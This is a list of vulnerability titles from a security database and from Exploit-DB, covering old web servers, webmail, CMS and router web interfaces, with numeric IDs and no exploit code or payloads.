[6085] Microsoft Internet Explorer scriptlet rendering could allow Web site operators to read files
[6068] BiblioWeb Server GET request denial of service
[6066] BiblioWeb Server directory traversal
[6064] Free Java Web Server directory traversal
[6061] HSWeb Web Server allows attacker to browse directories
[6058] Netscape Web Publisher poor ACL permissions
[6046] GoAhead WebServer directory traversal
[6031] Cisco CCS command line interface could allow read access to files and directories
[6030] Cisco CCS command line interface denial of service
[6011] Webmin use of tmpfiles could allow a local user to overwrite files
[6008] Allaire JRun allows file access using malformed WEB-INF directory request
[5982] LocalWEB2000 directory traversal
[5935] Compaq Web-Based Management buffer overflow
[5934] Basilix Webmail System allows unauthorized users to retrieve files
[5930] 24Link Web Server bypasses authentication
[5920] Web Extender Client (WEC) NTLM authentication
[5908] NetScreen Firewall WebUI buffer overflow
[5900] IBM WebSphere denial of service
[5833] IBM Informix Webdriver remote Admin access
[5827] IBM Informix Webdriver symbolic link
[5823] Microsoft IIS Web form submission denial of service
[5794] Poll It Web root directory is easily accessible
[5783] QNX Voyager Web server directory traversal could allow attackers to view files
[5782] BEA WebLogic Server dot dot URL buffer overflow
[5659] Apache Web server discloses files when used with php script
[5626] Cisco CBOS Web access enabled denial of service
[5625] phpWebLog allows users to bypass authentication
[5612] PostACI Webmail could reveal usernames and passwords
[5588] BEA WebLogic Server and Express could allow users to bypass authentication
[5572] McAfee WebShield outgoing SMTP recipient denial of service
[5571] McAfee WebShield SMTP filter bypass
[5554] WatchGuard SOHO Web config server could allow unauthenticated access
[5521] RobinHood HTTP Web server buffer overflow denial of service
[5482] Compaq Web-Based Management stores passwords in plaintext
[5446] iPlanet Web Server server side HTML parsing buffer overflow
[5407] Allaire JRun Server could allow unauthorized access to WEB-INF directory
[5396] Web servers allows attacker to remotely retrieve session ID cookies
[5383] Java Web Server "
[5366] BOA Webserver configuration file CGI execute
[5351] Web Shopper shopper.cgi allows remote file retrieval
[5347] eXtropia WebStore CGI allows remote file retrieval
[5332] ICQ Web Front URL passing could be used to create a denial of service
[5330] BOA Web Server directory traversal
[5326] Pegasus Mail allows Web sites to retrieve files from visiting user's systems
[5325] WebData allows importing of any file
[5297] Web+ example script allows attacker to execute commands or read files
[5290] Web+ reveals source code of WML files
[5289] Web+ exposes internal IP address
[5288] Web+ reveals physical path
[5252] IBM WebSphere Application Server Host: header denial of service
[5243] WebTV hijack code could forward stored mail
[5234] WebClerk long username and password denial of service
[5233] LocalWeb long filename denial of service
[5231] MetaWeb Server with MetaIP and Sendmail could allow a remote dot attack
[5216] WebTV UDP packet will cause a denial of service
[5214] IBM AIX allows unauthorized user to clear interface statistics
[5204] Apache WebDAV directory listings
[5197] Apache Web server reveals CGI script source code
[5157] WebSite Pro allows any user to upload files
[5135] Sun Java Web Server WebAdmin arbitrary code execution
[5127] Microsoft Virtual Machine java applet allows malicious Web site to masquerade as visitor
[5111] HP OpenView Network Node Manager Web password
[5107] IE 5.x and Outlook allows malicious Web site to view files
[5100] WebShield SMTP domain name period denial of service
[5096] BEA WebLogic redirect request plug-in buffer overflow can be used to gain root
[5069] Sun Solaris AnswerBook2 administration interface
[5027] BEA Systems WebLogic Java injection
[5024] BEA WebLogic FileServlet show code
[5012] IBM Websphere could allow an attacker to view source code
[4964] BAIR Web filtering software security bypass
[4955] Java Web server ACLs revealed
[4952] LISTSERV Web archive remote buffer overflow
[4949] WEBactive long GET request denial of service
[4936] Alibaba Web server CGI scripts allow user to view directory listing
[4935] Alibaba Web server exe script vulnerability allows user to overwrite files
[4934] Alibaba Web server long GET denial of service
[4925] CVSWeb CGI allows committers to gain shell access
[4901] Savant Web server buffer overflow
[4896] LocalWEB HTTP Server GET buffer overflow
[4895] Webmin SSL requests denial of service
[4874] Oracle Web Listener for AIX denial of service
[4836] Sawmill exposes first line of files on the Web server
[4792] WebSTAR Server Suite long GET request buffer overflow
[4776] HP Web JetAdmin networked peripherals denial of service
[4775] BEA WebLogic allows users to read source of files
[4771] DMailWeb can authenticate to untrusted POP servers
[4770] DMailWeb login could allow unauthorized access
[4759] NetWin DMailWeb long pohost denial of service
[4758] NetWin DMailWeb long username denial of service
[4742] WebBBS large GET request can overflow buffer and allow users to execute code
[4697] IBM Websphere allows users to read source of jsp files
[4696] Extropia WebBanner input validation allows user to execute arbitrary files
[4694] BEA WebLogic allows users to read source of JSP files
[4652] Network Associates WebShield SMTP allows remote users to set configuration options
[4651] Network Associates WebShield SMTP allows remote users to retrieve the service's configuration
[4621] Form and URL tampering possible in several Web-based shopping cart applications
[4616] Savant Web server allows remote user to read source code of CGI files
[4611] ColdFusion Web Application Server denial of service
[4586] Concatus iMate Web Mail Server 2.5 denial of service
[4574] ICQ Web Front guestbook overflow denial of service
[4566] BEA WebLogic Commerce Server two-way authentication disabled
[4550] Netscape Navigator could allow an attacker to masquerade as a legitimate Web site
[4542] Carello Web shopping cart add.exe allows remote file creation and duplication
[4540] Network Associates WebShield SMTP buffer overflow could allow remote code execution
[4506] IBM Lotus Domino Server file modification through a Web browser
[4505] IBM Lotus Domino Web applications may allow unauthorized access
[4463] Banner Rotating 01 Web site banner script administrator password accessible
[4447] Microsoft Internet Explorer bug allows Web page operator to view cookie
[4445] Microsoft Office UA Control malicious Web operator
[4437] BEA WebLogic Server is running with the demo certificate
[4420] DMailWeb QUERY_STRING buffer overflow
[4419] L-Soft's LISTSERV Web Archive component contains a remotely executable buffer overflow
[4408] UltraBoard allows attackers to access files on the Web server
[4318] InetServ 3.0 Webmail GET buffer overflow
[4293] iPlanet Web Server 4.1 GET denial of service
[4282] TalentSoft Web+ directory traversal allows attackers to read files
[4252] HTTP PUT method allows clients to upload files to a Web server
[4231] WebObjects large header denial of service
[4227] Microsoft Index Server webhits.dll reveals source of ASP files
[4215] Web servers may include malicious HTML tags
[4202] Netscape Enterprise Server WebPublisher allows unauthorized access
[4198] Oracle Web Listener allows remote attackers to execute arbitrary commands
[4120] MERCUR WebView WebMail-Client 1.0
[4116] Netscape Enterprise Server and iPlanet Web Server directory indexing
[4042] Trend Micro OfficeScan duplicate Web server can modify client configuration
[4009] SurfControl SuperScout Web Filter allows users to view unauthorized Web pages
[3923] Novell GroupWise Web server file read
[3833] Zeus Web Server weak password encryption
[3830] WebRamp has default password
[3725] HP Secure Web Console weak password encryption
[3666] Microsoft Internet Explorer Web Proxy Auto-Discovery could allow clients to accept untrusted proxy setting information
[3554] MDaemon WebConfig HTTP server can be remotely crashed by long requests
[3380] Zeus Web server remote root compromise
[3367] WebTrends Report Server default installation has blank administrator password
[3364] WebTrends Enterprise Reporting Server debug file allows world to access usernames and passwords
[2925] Network interface is in promiscuous mode
[2675] Microsoft IIS 4.0 samples installation on Web server
[2674] Browsing enabled for Web directory
[2673] Microsoft IIS samples installation on Web server
[2348] HotSpot VM equipped Web servers can be remotely crashed
[2311] WebTrends bad permissions on stored passwords
[2287] Novell Web servers can be remotely crashed or hung
[2280] WebSuite server remote denial of service
[2273] Netscape Web browsers allow access to sensitive information via the view-source: protocol
[2253] Aleph ExLibris Web server allows remote retrieval of system files
[2207] ColdFusion Web administration feature can be used to stop the CF server
[2205] Netscape Web browsers exploited for information by embedding scripts into TITLE
[2196] Counter.exe Web hit counter is vulnerable to a denial of service attack
[2192] Netscape Web browsers can be tricked into executing JavaScript via the bookmarks file
[2175] Alibaba Web server allows browsing the file system outside the server root directory
[2173] Microsoft Internet Explorer FSO could allow remote file manipulation from a Web server
[2085] ICQ personal Web server allows remote access to entire file system
[2072] WebCom's Guestbook CGI allows remote file reading
[2051] WebRamp routers can have their IP address changed from remote
[2050] WebRamp routers can be crashed from remote
[2039] HTML IMG tag width can be used to crash various Web browsers
[1914] HyperSeek CGI allows anyone to change Web content
[1898] IMail's Web service can be overflowed with a long URL
[1831] Cobalt RaQ Web server could reveal user's command history
[1812] Oracle Web Server 2.1 can be remotely crashed
[1810] Netscape Enterprise Server can be tricked into listing Web directories
[1795] SNMP agents reveal information about network interfaces
[1778] ICQ99 can be crashed through the built-in personal Web server
[1775] NFR webd contains a remotely exploitable buffer overflow
[1670] WebRamp M3 fails to restrict which remote hosts can open Telnet sessions
[1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
[1611] BackWeb Polite Agent Protocol Infopak spoofing
[1610] Apple Mac OS Web Sharing denial of service
[1598] Web browser frame spoof
[1585] Shockwave allows access to internal Web sites
[1583] Cisco PIX remote file exposure through included Web server
[1577] Cisco WCCP allows redirection of Web traffic
[1565] BackWeb stores proxy information in plaintext
[1533] Robots.txt file controls Web spiders
[1467] WEBgais CGI script allows remote command execution
[1465] Web finger access attempt
[1438] SNMP kill interface
[1418] Excite for Web Servers could allow remote command execution
[1410] Analog forms interface allows remote file retrieval
[1405] Netscape allows Web pages to browse directories and read files on system
[1384] Xitami Web servers allows remote execution of arbitrary files
[1377] Cold Fusion 3.x allows Web users to upload files to the system
[1368] Microsoft IIS 4.0 allows file execution in the Web site directory
[1366] Kolban Webcam32 can be remotely crashed or potentially used to execute arbitrary code
[1269] Microsoft IIS incorrect Web permissions
[952] Restricted Web directory with no security
[951] Wscript present on Web server
[950] Writable Web directory
[948] Microsoft IIS samples installed on Web server
[943] Microsoft Office installed on Web server
[942] Web directory with no security
[934] Executable Web directory
[932] Developer tools on Web server
[931] Cscript present on Web server
[930] Web directories with crossing paths
[928] Web directory browsing enabled
[926] Web password change using insecure connection
[925] 8.3 file names on Web server could allow an attacker to bypass security restrictions
[804] PPP interfaces
[709] Win32 Web servers allow access to files requested using the 8.3 format
[683] Cookies passed to Web browser
[524] DAT files in Temporary Internet Files directory store Web browser activity
[490] Malicious Java applets can be found on the Web
[488] ifconfig allows users to configure network interface parameters
[461] Netscape and Internet Explorer Web browsers allow attackers to acquire user ID and password
[414] HP-UX nettune utility allows non-privileged users to configure interfaces
[339] Novell Convert.bas Web server script
[333] SGI Webdist CGI script allows remote command execution
[297] Glimpse Web server allows remote command execution
[296] WebGais websendmail allows remote command execution
[295] WebSite 1.1 for Windows NT winsample buffer overflow
[294] WebSite 1.1 uploader
[146] Shell interpreters can be used to execute commands on Web servers
[90] Web server directories without an index file
[63] Win32 Web servers remote command execution through .CMD and .BAT files
Exploit-DB - https://www.exploit-db.com:
[31133] F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability
[30665] Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability
[30587] Axis Communications 207W Network Camera Web Interface admin/restartMessage.shtml server Parameter CSRF
[30586] Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF
[30585] Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF
[30167] Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability
[29277] winamp web interface 7.5.13 Multiple Vulnerabilities
[28062] Cisco CallManager 3.x/4.x Web Interface ccmuser/logon.asp XSS
[28061] Cisco CallManager 3.x/4.x Web Interface ccmadmin/phonelist.asp pattern Parameter XSS
[26771] Nortel SSL VPN 4.2.1 .6 Web Interface Input Validation Vulnerability
[25331] SonicWALL SOHO 5.1.7 Web Interface Multiple Remote Input Validation Vulnerabilities
[24792] IPCop 1.4.1 Web Administration Interface Proxy Log HTML Injection Vulnerability
[24621] Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability
[24245] Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS
[24235] ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass Vulnerability
[23687] Macallan Mail Solution Macallan Mail Solution 2.8.4 .6 (Build 260) - Web Interface Authentication Bypass Vulnerability
[23559] WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability
[23410] IBM Directory Server 4.1 Web Administration Interface Cross-Site Scripting Vulnerability
[23320] Mldonkey 2.5 -4 Web Interface Error Message Cross-site Scripting Vulnerability
[23135] FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness
[22859] Axis Print Server 6.15/6.20 Web Interface Denial of Service Vulnerability
[22692] Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability
[22639] IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability
[22407] Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial of Service Vulnerability
[22244] Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability
[22000] Zeus Web Server 4.0/4.1 Admin Interface Cross Site Scripting Vulnerability
[21827] HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability
[18343] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure
[17377] Polycom IP Phone Web Interface Data Disclosure Vulnerability
[17376] Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability
[17215] Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities
[15611] JDownloader Webinterface Source Code Disclosure Vulnerability
[14236] Sun Java Web Server 7.0 u7 Admin Interface DoS
[2895] J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit
[31147] Adult Webmaster PHP - Password Disclosure
[31110] Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion
[31109] Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion
[31108] Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion
[31107] Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion
[31095] Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross Site Scripting Vulnerabilities
[31079] webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability
[31064] WebCalendar 1.1.6 search.php adv Parameter XSS
[31063] WebCalendar 1.1.6 pref.php Query String XSS
[31055] Multiple Web Wiz Products Remote Information Disclosure Vulnerability
[31045] Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability
[31021] Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability
[30938] Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities
[30897] iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability
[30890] Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities
[30877] Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability
[30858] webSPELL 4.1.2 calendar.php Multiple Parameter XSS
[30857] webSPELL 4.1.2 usergallery.php galleryID Parameter XSS
[30856] Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities
[30855] WebDoc 3.0 Multiple SQL Injection Vulnerabilities
[30810] Proverbs Web Calendar 1.1 Password Parameter SQL Injection Vulnerability
[30770] AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities
[30768] IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness
[30761] WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities
[30759] VTLS Web Gateway 48.1 Searchtype Parameter Cross-Site Scripting Vulnerability
[30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability
[30746] Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability
[30745] Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability
[30730] SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion
[30708] Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability
[30706] CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability
[30651] Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 Remote File Include Vulnerability
[30649] NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities
[30642] AfterLogic MailBee WebMail Pro 3.x default.asp mode2 Parameter XSS
[30641] AfterLogic MailBee WebMail Pro 3.x login.php mode Parameter XSS
[30628] FSD 2.052/3.000 servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow
[30600] Xunlei Web Thunder 5.6.9.344 ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability
[30599] WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure
[30598] WebBatch webbatch.exe URL XSS
[30560] 212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability
[30518] Ripe Website Manager 0.8.x pages/delete_page.php id Parameter SQL Injection
[30501] Systeme de vote pour site Web 1.0 Multiple Remote File Include Vulnerabilities
[30483] Web News 1.1 news.php config[root_ordner] Parameter Remote File Inclusion
[30482] Web News 1.1 feed.php config[root_ordner] Parameter Remote File Inclusion
[30481] Web News 1.1 index.php config[root_ordner] Parameter Remote File Inclusion
[30442] WebDirector Index.PHP Cross Site Scripting Vulnerability
[30440] WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability
[30432] Novell GroupWise 6.5 WebAccess User.Id Parameter Cross Site Scripting Vulnerability
[30428] Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability
[30427] Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability
[30379] Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability
[30378] Webbler CMS 3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities
[30375] FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities
[30373] Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)
[30312] Citadel WebCit 7.02/7.10 showuser who Parameter XSS
[30310] Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities
[30299] ActiveWeb Contentserver 5.6.2929 CMS Client Side Filtering Bypass Vulnerability
[30296] ActiveWeb Contentserver 5.6.2929 Picture_Real_Edit.ASP SQL Injection Vulnerability
[30278] SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities
[30256] Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability
[30246] WHMCS 4.x & 5.x - Multiple Web Vulnerabilities
[30233] LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability
[30231] Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability
[30228] Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability
[30209] HP LoadRunner EmulationAdmin - Web Service Directory Traversal
[30199] WebIf OutConfig Parameter Local File Include Vulnerability
[30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
[30187] Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability
[30163] Blue Coat Systems K9 Web Protection 32.36 Remote Buffer Overflow Vulnerability
[30146] Print n Share v5.5 iOS - Multiple Web Vulnerabilities
[30143] WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability
[30100] British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities
[30067] rdiffweb 0.3.5 - Directory Traversal vulnerability
[30055] Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
[30038] Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access
[30031] Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities
[30027] CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability
[30000] Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities
[29961] TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS
[29960] TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection
[29957] ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS
[29956] ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS
[29943] Progress WebSpeed 3.0/3.1 - Denial of Service Vulnerability
[29908] TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Include Vulnerabilities
[29906] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion
[29905] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion
[29904] CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion
[29897] Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability
[29877] Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection
[29862] Web Service Deluxe News Manager 1.0.1 Deluxe Footer.PHP Local File Include Vulnerability
[29851] MailBee WebMail Pro 3.4 Check_login.ASP Cross-Site Scripting Vulnerability
[29847] phpwebnews 0.1 bukutamu.php m_txt Parameter XSS
[29846] phpwebnews 0.1 index.php m_txt Parameter XSS
[29845] phpwebnews 0.1 iklan.php m_txt Parameter XSS
[29843] webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability
[29762] Web Wiz Forums 8.05 String Filtering SQL Injection Vulnerability
[29744] Viper Web Portal 0.1 Index.PHP Remote File Include Vulnerability
[29742] Horde IMP Webmail <= 4.0.4 Client Multiple Input Validation Vulnerabilities
[29696] aWebNews 1.1 listing.php path_to_news Parameter Remote File Inclusion
[29688] EmbeddedWB Web Browser ActiveX Control - Remote Code Execution Vulnerability
[29612] WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability
[29610] Ezboo Webstats 3.03 Administrative Authentication Bypass Vulnerability
[29602] WebTester 5.0.20060927 directions.php typeID Parameter SQL Injection
[29575] Plain Old Webserver 0.0.7/0.0.8 Firefox Extension Directory Traversal Vulnerability
[29544] Juniper Junos J-Web - Privilege Escalation Vulnerability
[29534] SpoonLabs Vivvo Article Management CMS 3.40 Show_Webfeed.PHP SQL Injection Vulnerability
[29519] Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability
[29476] Microweber 0.905 - Error Based SQL Injection
[29461] Apple WebKit build 18794 WebCore Remote Denial of Service Vulnerability
[29439] iPlanet Web Server 4.1 Search Module Cross-Site Scripting Vulnerability
[29434] Magic Photo Storage Website user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion
[29433] Magic Photo Storage Website user/user_extend.php _config[site_path] Parameter Remote File Inclusion
[29432] Magic Photo Storage Website user/user_email.php _config[site_path] Parameter Remote File Inclusion
[29431] Magic Photo Storage Website user/user_catelog_password.php _config[site_path] Parameter Remote File Inclusion
[29430] Magic Photo Storage Website user/upload_photo.php _config[site_path] Parameter Remote File Inclusion
[29429] Magic Photo Storage Website user/register.php _config[site_path] Parameter Remote File Inclusion
[29428] Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion
[29427] Magic Photo Storage Website user/login.php _config[site_path] Parameter Remote File Inclusion
[29426] Magic Photo Storage Website user/index.php _config[site_path] Parameter Remote File Inclusion
[29425] Magic Photo Storage Website user/delete_category.php _config[site_path] Parameter Remote File Inclusion
[29424] Magic Photo Storage Website user/couple_profile.php _config[site_path] Parameter Remote File Inclusion
[29423] Magic Photo Storage Website user/couple_milestone.php _config[site_path] Parameter Remote File Inclusion
[29422] Magic Photo Storage Website user/change_catalog_template.php _config[site_path] Parameter Remote File Inclusion
[29421] Magic Photo Storage Website user/add_news.php _config[site_path] Parameter Remote File Inclusion
[29420] Magic Photo Storage Website user/add_category.php _config[site_path] Parameter Remote File Inclusion
[29419] Magic Photo Storage Website include/db_config.php _config[site_path] Parameter Remote File Inclusion
[29418] Magic Photo Storage Website include/config.php _config[site_path] Parameter Remote File Inclusion
[29417] Magic Photo Storage Website admin/send_email.php _config[site_path] Parameter Remote File Inclusion
[29416] Magic Photo Storage Website admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion
[29415] Magic Photo Storage Website admin/list_members.php _config[site_path] Parameter Remote File Inclusion
[29414] Magic Photo Storage Website admin/index.php _config[site_path] Parameter Remote File Inclusion
[29413] Magic Photo Storage Website admin/delete_member.php _config[site_path] Parameter Remote File Inclusion
[29412] Magic Photo Storage Website admin/approve_member.php _config[site_path] Parameter Remote File Inclusion
[29411] Magic Photo Storage Website admin/admin_paypal_email.php _config[site_path] Parameter Remote File Inclusion
[29410] Magic Photo Storage Website admin/add_templates.php _config[site_path] Parameter Remote File Inclusion
[29409] Magic Photo Storage Website admin/admin_email.php _config[site_path] Parameter Remote File Inclusion
[29408] Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion
[29407] Magic Photo Storage Website admin/admin_password.php _config[site_path] Parameter Remote File Inclusion
[29354] pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities
[29304] Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection Vulnerability
[29299] Mini Web Shop 2.1.c View.PHP Viewcategory.PHP Cross-Site Scripting Vulnerability
[29274] Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability
[29238] cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities
[29188] cPanel WebHost Manager 3.1 park ndomain Parameter XSS
[29187] cPanel WebHost Manager 3.1 dofeaturemanager feature Parameter XSS
[29186] cPanel WebHost Manager 3.1 editzone domain Parameter XSS
[29185] cPanel WebHost Manager 3.1 domts2 domain Parameter XSS
[29184] cPanel WebHost Manager 3.1 editpkg pkg Parameter XSS
[29183] cPanel WebHost Manager 3.1 addon_configsupport.cgi supporturl Parameter XSS
[29182] cPanel WebHost Manager 3.1 dochangeemail email Parameter XSS
[29162] My Little Weblog 2006.11.21 0 Weblog.php Cross-Site Scripting Vulnerability
[29132] WebTester 5.x Command Execution
[29124] Enthrallweb eHomes result.asp Multiple Parameter XSS
[29123] Enthrallweb eHomes result.asp Multiple Parameter SQL Injection
[29122] Enthrallweb eHomes compareHomes.asp Multiple Parameter SQL Injection
[29121] Enthrallweb eHomes homeDetail.asp AD_ID Parameter SQL Injection
[29120] Enthrallweb eClassifieds dirSub.asp sid Parameter SQL Injection
[29119] Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection
[29118] Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection
[29081] BestWebApp Dating Site login_form.asp msg Parameter XSS
[29080] BestWebApp Dating Site Login Component Multiple Field SQL Injection
[29045] Selenium Web Server 1.0 XSS
[29034] Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities
[28995] WebTester 5.x - Multiple Vulnerabilities
[28988] Roundcube Webmail 0.1 index.PHP Cross-Site Scripting Vulnerability
[28981] IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability
[28979] DornCMS Application 1.4 - Multiple Web Vulnerabilities
[28977] UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities
[28975] My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities
[28960] aMSN 0.98.9 Web App - Multiple Vulnerabilities
[28943] FreeWebshop 2.1/2.2 index.php cat Parameter XSS
[28942] FreeWebshop 2.1/2.2 index.php page Parameter Traversal Arbitrary File Access
[28898] FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability
[28891] Mirapoint Web Mail Expression() HTML Injection Vulnerability
[28884] BlooMooWeb 1.0.9 ActiveX Control Multiple Vulnerabilities
[28883] Easy Web Portal 2.1.2 - Multiple Remote File Include Vulnerabilities
[28869] Web Wiz Forum 6.34/7.x Search.ASP SQL Injection Vulnerability
[28854] Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection
[28825] Dev Web Manager System 1.5 Index.PHP Cross-Site Scripting Vulnerability
[28820] Webgenius Goop Gallery 2.0 Index.PHP Cross-Site Scripting Vulnerability
[28815] H-Sphere 2.x WebShell Login.PHP Cross-Site Scripting Vulnerability
[28778] ironwebmail <= 6.1.1 - Directory Traversal information disclosure vulnerability
[28774] PHPWebSite 0.10.2 PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities
[28737] PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability
[28720] Web//News 1.4 Parser.PHP Remote File Include Vulnerability
[28714] PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability
[28708] elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities
[28640] CA eSCC r8/1.0,eTrust Audit r8/1.5 Web Server Path Disclosure
[28610] NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_name Parameter XSS
[28609] NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_id Variable Arbitrary User Information Modification
[28608] NeoSys Neon Webmail for Java 5.06/5.07 maillist Servlet Multiple Parameter SQL Injection
[28607] NeoSys Neon Webmail for Java 5.06/5.07 addrlist Servlet Multiple Parameter SQL Injection
[28606] NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet Arbitrary Mail Message Manipulation
[28605] NeoSys Neon Webmail for Java 5.06/5.07 downloadfile Servlet Traversal Arbitrary File Access
[28592] PHP-post Web Forum 0.x.1.0 pm.php replyuser Parameter XSS
[28591] PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection
[28590] Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities
[28589] Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting Vulnerability
[28556] e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS
[28554] e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS
[28552] e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS
[28551] e107 website system 0.7.5 search.php Query String (PATH_INFO) Parameter XSS
[28549] e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS
[28548] e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS
[28547] e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS
[28546] e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS
[28545] e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS
[28489] Easy Address Book Web Server 1.2 - Remote Format String Vulnerability
